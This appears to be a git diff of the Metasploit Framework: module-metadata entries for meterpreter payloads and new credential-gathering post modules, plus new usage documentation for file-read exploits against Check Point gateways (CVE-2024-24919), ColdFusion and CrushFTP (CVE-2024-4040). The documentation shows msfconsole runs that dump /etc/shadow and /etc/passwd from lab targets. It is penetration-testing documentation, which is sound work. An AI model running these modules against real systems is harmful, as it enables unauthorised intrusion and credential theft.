   "payload_osx/armle/execute/bind_tcp": {
     "name": "OS X Write and Execute Binary, Bind TCP Stager",
     "fullname": "payload/osx/armle/execute/bind_tcp",
@@ -234603,7 +236859,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "osx/x64/meterpreter_reverse_http",
@@ -234641,7 +236897,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "osx/x64/meterpreter_reverse_https",
@@ -234679,7 +236935,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "osx/x64/meterpreter_reverse_tcp",
@@ -250996,7 +253252,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-11-07 18:55:42 +0000",
+    "mod_time": "2024-06-28 10:36:35 +0000",
     "path": "/modules/post/linux/gather/apache_nifi_credentials.rb",
     "is_install_path": true,
     "ref_name": "linux/gather/apache_nifi_credentials",
@@ -251039,13 +253295,13 @@
     "references": [
 
     ],
-    "platform": "Linux",
+    "platform": "Linux,Unix",
     "arch": "",
     "rport": null,
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-07-19 19:47:17 +0000",
+    "mod_time": "2024-04-26 21:58:43 +0000",
     "path": "/modules/post/linux/gather/checkcontainer.rb",
     "is_install_path": true,
     "ref_name": "linux/gather/checkcontainer",
@@ -251053,6 +253309,15 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
     },
     "session_types": [
       "shell",
@@ -252816,6 +255081,55 @@
 
     ]
   },
+  "post_multi/gather/azure_cli_creds": {
+    "name": "Azure CLI Credentials Gatherer",
+    "fullname": "post/multi/gather/azure_cli_creds",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "James Otten <jamesotten1@gmail.com>",
+      "h00die"
+    ],
+    "description": "This module will collect the Azure CLI 2.0+ (az cli) settings files\n          for all users on a given target. These configuration files contain\n          JWT tokens used to authenticate users and other subscription information.\n          Once tokens are stolen from one host, they can be used to impersonate\n          the user from a different host.",
+    "references": [
+
+    ],
+    "platform": "Linux,OSX,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-06-27 10:45:05 +0000",
+    "path": "/modules/post/multi/gather/azure_cli_creds.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/azure_cli_creds",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
   "post_multi/gather/check_malware": {
     "name": "Multi Gather Malware Verifier",
     "fullname": "post/multi/gather/check_malware",
@@ -258018,6 +260332,58 @@
 
     ]
   },
+  "post_windows/gather/credentials/adi_irc": {
+    "name": "Adi IRC credential gatherer",
+    "fullname": "post/windows/gather/credentials/adi_irc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on AdiIRC Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 15:05:42 +0000",
+    "path": "/modules/post/windows/gather/credentials/adi_irc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/adi_irc",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
   "post_windows/gather/credentials/aim": {
     "name": "Aim credential gatherer",
     "fullname": "post/windows/gather/credentials/aim",
@@ -258147,6 +260513,58 @@
 
     ]
   },
+  "post_windows/gather/credentials/carotdav_ftp": {
+    "name": "CarotDAV credential gatherer",
+    "fullname": "post/windows/gather/credentials/carotdav_ftp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on CarotDAV FTP Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 14:52:58 +0000",
+    "path": "/modules/post/windows/gather/credentials/carotdav_ftp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/carotdav_ftp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
   "post_windows/gather/credentials/chrome": {
     "name": "Chrome credential gatherer",
     "fullname": "post/windows/gather/credentials/chrome",
@@ -259014,6 +261432,58 @@
 
     ]
   },
+  "post_windows/gather/credentials/halloy_irc": {
+    "name": "Halloy IRC credential gatherer",
+    "fullname": "post/windows/gather/credentials/halloy_irc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on Halloy IRC Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 14:07:48 +0000",
+    "path": "/modules/post/windows/gather/credentials/halloy_irc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/halloy_irc",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
   "post_windows/gather/credentials/heidisql": {
     "name": "Windows Gather HeidiSQL Saved Password Extraction",
     "fullname": "post/windows/gather/credentials/heidisql",
@@ -260301,6 +262771,58 @@
 
     ]
   },
+  "post_windows/gather/credentials/quassel_irc": {
+    "name": "Quassel IRC credential gatherer",
+    "fullname": "post/windows/gather/credentials/quassel_irc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on Quassel IRC Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 15:09:51 +0000",
+    "path": "/modules/post/windows/gather/credentials/quassel_irc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/quassel_irc",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
   "post_windows/gather/credentials/razer_synapse": {
     "name": "Windows Gather Razer Synapse Password Extraction",
     "fullname": "post/windows/gather/credentials/razer_synapse",
@@ -260974,6 +263496,58 @@
 
     ]
   },
+  "post_windows/gather/credentials/sylpheed": {
+    "name": "Sylpheed email credential gatherer",
+    "fullname": "post/windows/gather/credentials/sylpheed",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on Sylpheed email client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 14:58:51 +0000",
+    "path": "/modules/post/windows/gather/credentials/sylpheed.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/sylpheed",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
   "post_windows/gather/credentials/tango": {
     "name": "Tango credential gatherer",
     "fullname": "post/windows/gather/credentials/tango",

docs/.ruby-version

@@ -1 +1 @@
-3.0.5
+3.1.5

docs/Gemfile.lock

@@ -76,11 +76,13 @@ GEM
     rb-fsevent (0.11.2)
     rb-inotify (0.10.1)
       ffi (~> 1.0)
-    rexml (3.2.5)
+    rexml (3.2.7)
+      strscan (>= 3.0.9)
     rouge (4.0.0)
     safe_yaml (1.0.5)
     sassc (2.4.0)
       ffi (~> 1.9)
+    strscan (3.1.0)
     terminal-table (3.0.2)
       unicode-display_width (>= 1.1.1, < 3)
     unicode-display_width (2.3.0)

docs/metasploit-framework.wiki/Definition-of-Module-Reliability-Side-Effects-and-Stability.md

@@ -70,3 +70,4 @@ Example:
 | FIRST_ATTEMPT_FAIL | The module may fail for the first attempt |
 | REPEATABLE_SESSION | The module is expected to get a session every time it runs |
 | UNRELIABLE_SESSION | The module isn't expected to get a shell reliably (such as only once) |
+| EVENT_DEPENDENT    | The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc |

docs/metasploit-framework.wiki/dev/Setting-Up-a-Metasploit-Development-Environment.md

@@ -202,13 +202,33 @@ git fetch upstream
 git checkout fixes-to-pr-12345 upstream/pr/12345
 ```
 
-If you're writing test cases (which you should), then make sure [rspec] works:
+## Running and writing tests
+
+If you're writing test cases (which you should), you should first configure your local database:
 
 ```bash
-rake spec
+bundle exec rake db:create db:migrate db:seed RAILS_ENV=test
 ```
 
-You should see over 9000 tests run, mostly resulting in green dots, a few in yellow stars, and no red errors.
+Then make sure [rspec] works:
+
+```bash
+bundle exec rspec
+```
+
+To run tests defined in file(s):
+
+```bash
+bundle exec rspec ./spec/path/to/your/tests_1.rb ./spec/path/to/your/tests_2.rb
+```
+
+To run run the tests defined at a line number - for instance line 23:
+
+```
+bundle exec rspec ./spec/path/to/your/tests_1.rb:23
+```
+
+Newly contributed tests should follow the conventions defined by [BetterSpecs.org] - with the additional requirement that all `it` blocks should have a human readable description.
 
 # Great!  Now what?
 
@@ -250,3 +270,5 @@ Finally, we welcome your feedback on this guide, so feel free to reach out to us
 [@kernelsmith]:https://github.com/kernelsmith
 [@corelanc0d3r]:https://github.com/corelanc0d3r
 [@ffmike]:https://github.com/ffmike
+
+[BetterSpecs.org]:https://www.betterspecs.org/

documentation/modules/auxiliary/admin/ldap/shadow_credentials.md

@@ -261,4 +261,4 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username
 [*] Certificate stored at: /home/user/.msf4/loot/20240404122240_default_20.92.148.129_windows.ad.cs_785877.pfx
 [+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 1107833b-0eb6-0477-a7c6-3590b326851a
 [*] Auxiliary module execution completed
-```
+```

documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md

@@ -60,14 +60,17 @@ msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options
 
 Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
 
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   BASE_DN                    no        LDAP base DN if you already have it
-   NEW_PASSWORD               no        Password of admin user to add
-   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT     636              yes       The target port
-   SSL       true             no        Enable SSL on the LDAP connection
-   NEW_USERNAME               no        Username of admin user to add
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   BASE_DN                        no        LDAP base DN if you already have it
+   DOMAIN                         no        The domain to authenticate to
+   NEW_PASSWORD                   no        Password of admin user to add
+   NEW_USERNAME                   no        Username of admin user to add
+   PASSWORD                       no        The password to authenticate with
+   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         636              yes       The target port
+   SSL           true             no        Enable SSL on the LDAP connection
+   USERNAME                       no        The username to authenticate with
 
 
 Auxiliary action:

documentation/modules/auxiliary/admin/registry_security_descriptor.md

@@ -0,0 +1,84 @@
+## Vulnerable Application
+
+This module reads or writes a Windows registry security descriptor remotely.
+
+In READ mode, the `FILE` option can be set to specify where the security
+descriptor should be written to.
+
+The following format is used:
+```
+key: <registry key>
+security_info: <security information>
+sd: <security descriptor as a hex string>
+```
+
+In WRITE mode, the `FILE` option can be used to specify the information needed
+to write the security descriptor to the remote registry. The file must follow
+the same format as described above.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/admin/registry_security_descriptor`
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key>`
+1. **Verify** the registry key security descriptor is displayed
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key> file=<file path>`
+1. **Verify** the registry key security descriptor is saved to the file
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key> action=write sd=<security descriptor as a hex string>`
+1. **Verify** the security descriptor is correctly set on the given registry key
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> file=<file path>`
+1. **Verify** the security descriptor taken from the file is correctly set on the given registry key
+
+## Options
+
+### KEY
+Registry key to read or write.
+
+### SD
+Security Descriptor to write as a hex string.
+
+### SECURITY_INFORMATION
+Security Information to read or write (see
+https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/23e75ca3-98fd-4396-84e5-86cd9d40d343
+(default: OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION).
+
+### FILE
+File path to store the security descriptor when reading or source file path used to write the security descriptor when writing
+
+
+## Scenarios
+
+### Read against Windows Server 2019
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 action=READ key='HKLM\SECURITY\Policy\PolEKList'
+[*] Running module against 192.168.101.124
+
+[+] 192.168.101.124:445 - Raw security descriptor for HKLM\SECURITY\Policy\PolEKList: 01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000
+[*] Auxiliary module execution completed
+```
+
+### Write against Windows Server 2019
+Note that the information security has been set to 4 (DACL_SECURITY_INFORMATION) to avoid an access denied error.
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 key='HKLM\SECURITY\Policy\PolEKList' action=WRITE sd=01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000 security_information=4
+[*] Running module against 192.168.101.124
+
+[+] 192.168.101.124:445 - Security descriptor set for HKLM\SECURITY\Policy\PolEKList
+[*] Auxiliary module execution completed
+```
+
+### Write against Windows Server 2019 (from file)
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 action=WRITE file=/tmp/remote_registry_sd_backup.yml
+[*] Running module against 192.168.101.124
+
+[*] 192.168.101.124:445 - Getting security descriptor info from file /tmp/remote_registry_sd_backup.yml
+  key: HKLM\SECURITY\Policy\PolEKList
+  security information: 4
+  security descriptor: 01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000
+[+] 192.168.101.124:445 - Security descriptor set for HKLM\SECURITY\Policy\PolEKList
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md

@@ -0,0 +1,109 @@
+## Vulnerable Application
+This module leverages an unauthenticated arbitrary root file read vulnerability for
+Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades
+are enabled on affected devices, traversal payloads can be used to read any files on
+the local file system. Password hashes read from disk may be cracked, potentially
+resulting in administrator-level access to the target device. This vulnerability is
+tracked as CVE-2024-24919.
+
+## Options
+
+### STORE_LOOT
+Whether the read file's contents should be outputted to the console or stored as loot (default: false).
+
+### TARGETFILE
+The target file to read (default: /etc/shadow). This should be a full Linux file path. Files containing binary data may
+not be read accurately.
+
+## Testing
+To set up a test environment:
+1. Download an affected version of Check Point Security Gateway (Such as Check_Point_R81.20_T631.iso, SHA1:
+42e25f45ab6b1694a97f76ca363d58040802e6d6).
+1. Install the ISO within a virtual machine.
+1. Browse to the administrator web dashboard on port 443 and complete the first-time setup tasks.
+1. On a Windows system, download and install a copy of Check Point SmartConsole, then use it to authenticate to Security Gateway.
+1. In SmartConsole, enable and configure the vulnerable Mobile Access or IPSec VPN blades. These instructions focus on Mobile Access:
+   1. Open the Gateway Properties:
+      1. Navigate to Gateways & Servers in the left-hand menu.
+      1. Select the gateway you want to configure.
+      1. Right-click on the gateway and select Edit.
+   1. Enable Mobile Access:
+      1. In the General Properties tab, under Network Security, check the box for Mobile Access.
+      1. Click on Mobile Access in the left-hand menu of the gateway properties window to access the Mobile Access settings.
+   1. Configure Mobile Access:
+      1. Set up the authentication methods under Authentication (e.g., LDAP, RADIUS, etc.).
+      1. Configure the Portal Settings, specifying the URL for the Mobile Access Portal.
+      1. Under Applications, define which applications and resources will be accessible via the Mobile Access portal.
+      1. Click OK to close the properties window.
+1. Publish and push the configuration changes to the device.
+   1. In SmartConsole, after completing your configuration, click on the Publish button at the top right corner of the
+      SmartConsole window. This will save your changes to the management database.
+   1. After publishing the changes, click on the Install Policy button located at the top of the SmartConsole window.
+   1. In the Install Policy window, select the policy package you want to install. This is typically your main security policy package.
+   1. Choose the gateways on which you want to install the policy. Make sure to select the gateway that you configured
+      for Mobile Access and/or IPSec VPN.
+   1. Click Install to begin the installation process. Once this process completes the gateway should then be vulnerable to this module.
+
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set TARGETFILE <TARGET_FILE_TO_READ>`
+6. `set STORE_LOOT false` if you want to display the target file on the console instead of storing it as loot.
+7. `run`
+
+## Scenarios
+### Check Point Security Gateway Linux
+```
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > show options 
+
+Module options (auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT       443              yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT  false            yes       Store the target file as loot
+   TARGETFILE  /etc/shadow      yes       The target file to read. This should be a full Linux file path. Files containing binary data may not be read accurately
+   TARGETURI   /                yes       The URI path to Check Point Security Gateway
+   VHOST                        no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set RHOSTS 192.168.181.128
+RHOSTS => 192.168.181.128
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > check
+[+] 192.168.181.128:443 - The target is vulnerable. Arbitrary file read successful!
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
+[*] Running module against 192.168.181.128
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Arbitrary file read successful!
+[+] File read succeeded! 
+admin:$6$hHJHiZdC2kHPD5HQ$/0dtMC53GSaZpLA/MeChOvJNNE4i9qoKL57Dsl853wF/RRNzJJ6CO5/qBmzCM7KdEUmXanF3J8T50ppLh/Sf2/:14559:0:99999:8:::
+monitor:*:19872:0:99999:8:::
+root:*:19872:0:99999:7:::
+cp_routeevt:*:19872:0:99999:7:::
+nobody:*:19872:0:99999:7:::
+postfix:*:19872:0:99999:7:::
+rpm:!!:19872:0:99999:7:::
+shutdown:*:19872:0:99999:7:::
+pcap:!!:19872:0:99999:7:::
+halt:*:19872:0:99999:7:::
+cp_postgres:*:19872:0:99999:7:::
+cp_extensions:*:19872:0:99999:7:::
+cpep_user:*:19872:0:99999:7:::
+vcsa:!!:19872:0:99999:7:::
+_nonlocl:*:19872:0:99999:7:::
+sshd:*:19872:0:99999:7:::
+
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.md

@@ -0,0 +1,59 @@
+## Vulnerable Application
+This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
+'2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
+token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
+UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
+
+### Setup
+
+#TODO: Find out how to setup a vulnerable target and put those details here.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use coldfusion_pms_servlet_file_read`
+1. Set the `RHOST` and datastore option
+1. If the target host is running Windows, change the default `FILE_PATH` datastore options from `/tmp/passwd` to a file path that exists on Windows.
+1. Run the module
+1. Receive the contents of the `FILE_PATH` file 
+
+## Scenarios
+### ColdFusion Version 2023.0.0.330468 running on Linux
+
+```
+msf6 auxiliary(gather/coldfusion_pms_servlet_file_read) > run
+[*] Reloading module...
+[*] Running module against 127.0.0.1
+
+[*] Attempting to retrieve UUID ...
+[+] UUID found: 1c49c29a-f1c0-4ed0-9f9e-215f434c8a12
+[*] Attempting to exploit directory traversal to read /etc/passwd
+[+] File content:
+n00tmeg:x:1000:1000:n00tmeg,,,:/home/n00tmeg:/bin/bash
+hplip:x:127:7:HPLIP system user,,,:/run/hplip:/bin/false
+pulse:x:125:132:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+colord:x:123:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+nm-openvpn:x:121:127:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+whoopsie:x:117:124::/nonexistent:/bin/false
+cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
+uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+
+[+] Results saved to: /Users/jheysel/.msf4/loot/20240403192500_default_127.0.0.1_coldfusion.file_475871.txt
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/gather/crushftp_fileread_cve_2024_4040.md

@@ -0,0 +1,81 @@
+## Vulnerable Application
+This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and
+< 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without
+authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The
+primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote
+code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).
+More information can be found in the [Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis).
+
+## Options
+
+### INJECTINTO
+The unauthenticated API function to use for template injection (default: zip).
+
+### STORE_LOOT
+Whether the read file's contents should be outputted to the console or stored as loot (default: false).
+
+### TARGETFILE
+The target file to read (default: users/MainUsers/groups.XML). This can be a full path, a relative path, or a network share path (if 
+firewalls permit). Files containing binary data may not be read accurately. Though file paths for Windows targets can contain `:` 
+characters, like `C:\Windows\win.ini`, this will result in payloads not being fully redacted from CrushFTP logs.
+
+## Testing
+To set up a test environment:
+1. Download an affected version of CrushFTP [here](https://github.com/the-emmons/CVE-2023-43177/releases/download/crushftp_software/CrushFTP10.zip) (SHA256: adc3619937ebb57b3a95c50f78fda5c388d072c0d34a317b9ed64a31127a6d3f).
+2. Configure `CRUSH_DIR` in `crushftp_init.sh` to point to the correct install directory.
+3. Execute `java -jar CrushFTP.jar` to show a local client GUI interface that can be used to set up an admin account.
+4. Execute `sudo crushftp_init.sh start` to launch the software on Linux or Mac. If on Windows, run `CrushFTP.exe` as an administrator.
+5. Follow the verification steps below.
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/gather/crushftp_fileread_cve_2024_4040`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set TARGETFILE <TARGET_FILE_TO_READ>`
+6. `set STORE_LOOT false` if you want to display file on the console instead of storing it as loot.
+7. `run`
+
+## Scenarios
+### CrushFTP on Windows, Linux, or Mac
+```
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > show options 
+
+Module options (auxiliary/gather/crushftp_fileread_cve_2024_4040):
+
+   Name        Current Setting             Required  Description
+   ----        ---------------             --------  -----------
+   INJECTINTO  zip                         yes       The CrushFTP API function to inject into (Accepted: zip, exists)
